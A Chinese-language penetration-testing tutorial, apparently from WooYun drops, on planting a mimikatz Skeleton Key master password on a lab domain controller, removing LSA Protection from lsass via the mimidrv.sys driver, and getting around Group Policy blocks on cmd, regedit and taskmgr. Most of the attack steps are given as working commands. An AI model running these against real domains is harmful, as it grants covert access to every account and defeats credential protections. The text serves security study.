上篇介紹了利用SSP來維持域控權限,美中不足在于其需要域控重啟才能生效,而在眾多的域滲透方法中,當然存在不需要域控重啟即能生效的方法,所以這次就介紹其中的一個方法——Skeleton Key
Skeleton Key被安裝在64位的域控服務器上
支持Windows Server2003—Windows Server2012 R2
能夠讓所有域用戶使用同一個萬能密碼進行登錄
現有的所有域用戶使用原密碼仍能繼續登錄
重啟后失效
Mimikatz(Version 2.0 alpha,20150107)支持 Skeleton Key
參考代碼:
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c
測試環境
域控:Server 2008 R2 x64
域內主機: Win7 x64
用戶名:[email protected]
密碼:12345678!Q
cmd命令:
#!bash
net use \\WIN-8VVLRPIAJB0.test.local 12345678!Q /user:[email protected]
dir \\WIN-8VVLRPIAJB0.test.local\c$
如圖
mimikatz命令:
#!bash
privilege::debug
misc::skeleton
如圖
注:
64系統需要使用64位的mimikatz
(1)清除net use連接
cmd命令:
#!bash
net use */del /y
如圖
(2)使用Skeleton Key登錄
mimikatz的默認Skeleton Key設置為mimikatz
cmd命令:
#!bash
net use \\WIN-8VVLRPIAJB0.test.local mimikatz /user:[email protected]
dir \\WIN-8VVLRPIAJB0.test.local\c$
如圖
(3)權限測試
a、使用域內不存在的用戶+Skeleton Key登錄
b、使用域內普通權限用戶+Skeleton Key登錄
如圖
發現使用域內不存在的用戶無法登錄
使用域內普通權限用戶無法訪問域控
結論: Skeleton Key只是給所有賬戶添加了一個萬能密碼,無法修改賬戶的權限
微軟在2014年3月12日添加了LSA保護策略,用來防止對進程lsass.exe的代碼注入,這樣一來就無法使用mimikatz對lsass.exe進行注入,相關操作也會失敗。
適用系統:
Windows 8.1
Windows Server 2012 R2
所以接下來換用Windows Server 2012 R2 x64進行測試
(1)配置LSA Protection
注冊表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
如圖
新建-DWORD
值,名稱為RunAsPPL
,數值為00000001
如圖
重啟系統
(2)測試Skeleton Key
mimikatz命令:
#!bash
privilege::debug
misc::skeleton
此時失敗
(3)繞過LSA Protection
mimikatz早在2013年10月就已支持繞過LSA Protection
如圖
參考源碼:
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_kernel.c
注:
該功能需要mimidrv.sys文件
mimikatz命令:
#!bash
privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton
如圖,導入驅動文件mimidrv.sys后,繞過LSA Protection,操作成功
分享一些常見問題的解決方法,管理員常常會禁用一些重要程序的運行,比如cmd、regedit、taskmgr
輸出gpedit.msc
進入本地組策略編輯器
本地計算機測試-用戶配置-管理模板-系統
如圖
禁用cmd:
選擇"阻止訪問命令提示符"-啟用
禁用regedit:
選擇"阻止訪問注冊表編輯工具"-啟用
禁用taskmgr:
選擇"不要運行指定的Windows應用程序"-不允許的應用程序列表-填入taskmgr.exe-啟用
測試:
如圖cmd、regedit、taskmgr均已被禁用
mimikatz命令:
#!bash
privilege::debug
misc::cmd
misc::regedit
misc::taskmgr
如圖,成功執行,繞過限制
這次不僅測試了Skeleton Key
,還介紹了mimikatz
的一些隱藏功能,而這些功能并未在其官方說明文檔中出現。
其實通過研究mimikatz
的源碼,你會發現還有許多的隱藏功能值得挖掘利用。
還是那句老話,只有了解如何攻擊才能更好的防御,希望本文無論是對滲透攻擊還是防御,均有幫助。
本文由三好學生原創并首發于烏云drops,轉載請注明